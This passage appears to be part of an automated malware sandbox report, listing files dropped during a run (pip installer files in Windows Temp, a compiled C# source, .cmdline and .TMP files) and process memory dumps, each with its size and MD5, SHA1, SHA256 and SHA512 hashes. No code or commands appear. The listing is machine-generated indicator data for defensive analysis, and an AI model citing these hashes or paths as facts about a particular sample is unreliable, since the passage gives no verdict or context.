                                  50KB

                                  MD5

                                  888eb713a0095756252058c9727e088a

                                  SHA1

                                  c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

                                  SHA256

                                  79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

                                  SHA512

                                  7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

                                • C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\pip_JustForMe

                                  Filesize

                                  268KB

                                  MD5

                                  494f112096b61cb01810df0e419fb93c

                                  SHA1

                                  295c32c8e1654810c4807e42ba2438c8da39756a

                                  SHA256

                                  2a1f085a0ad75d5b332fb0fe9e1a40146c311e8e524e898a09ca40157619fa80

                                  SHA512

                                  9c8ec8fcc5d74b5022cd170677b62dfedbc187fde1dd296bdb9733bec03e18674a385928c8827a4ce1864433d50e8598228a6d2198aef2937c0dcc0d8f4ea704

                                • \??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP

                                  Filesize

                                  652B

                                  MD5

                                  d934ed5c0ef301a1a78f18c914a14d1d

                                  SHA1

                                  b94488c6a4b4e72ebc8cd3433cc69ac4186b3016

                                  SHA256

                                  0eed5958828bc41a8bbd27a6d2f0522dc00d7aa3cfde654459839641722ff5f1

                                  SHA512

                                  3c89f67ce422fe94fcdef09b56a0bf76eef1ef67769fd8c5c82a08c356188b3cacf04cac701623663f11c86726b0456367bb7574aa403aeff7ad208e31f497b0

                                • \??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.0.cs

                                  Filesize

                                  312B

                                  MD5

                                  ecbf151f81ff98f7dff196304a40239e

                                  SHA1

                                  ccf6b97b6f8276656b042d64f0595963fe9ec79c

                                  SHA256

                                  295ca195631c485c876e7c468ddcbb3fe7cd219d3e5005a2441be2de54e62ac8

                                  SHA512

                                  4526a59055a18af6c0c13fb9f55a9a9bc15aa1407b697849e19b6cc32c88ee7206b3efff806bd154d36bce144ae1d9c407c6ea0f5077c54fbe92cd172c203720

                                • \??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline

                                  Filesize

                                  369B

                                  MD5

                                  366d6358ae0e764d01dfab337fd1bdd1

                                  SHA1

                                  ccbdeb65c9943677f987e4d26922eb0c05808abc

                                  SHA256

                                  836f090daaf42522286d8a9882a61655fe67920f6f816c4c1ce8b87db6329a7b

                                  SHA512

                                  7b9371aff7fa2de3533baeb5eae03643bcfdb38c6897907fc206463fb12beef2b2b8b70067b4062d7afb896357a7663beef03c0ddd15569b9451b34432e5d301

                                • memory/1684-103-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1684-99-0x0000025E949E0000-0x0000025E949E8000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/1684-85-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1684-84-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1684-74-0x0000025E949B0000-0x0000025E949D2000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/1684-73-0x00007FFCC52D3000-0x00007FFCC52D5000-memory.dmp

                                  Filesize

                                  8KB

                                • memory/4584-116-0x000001C8FF830000-0x000001C8FF880000-memory.dmp

                                  Filesize

                                  320KB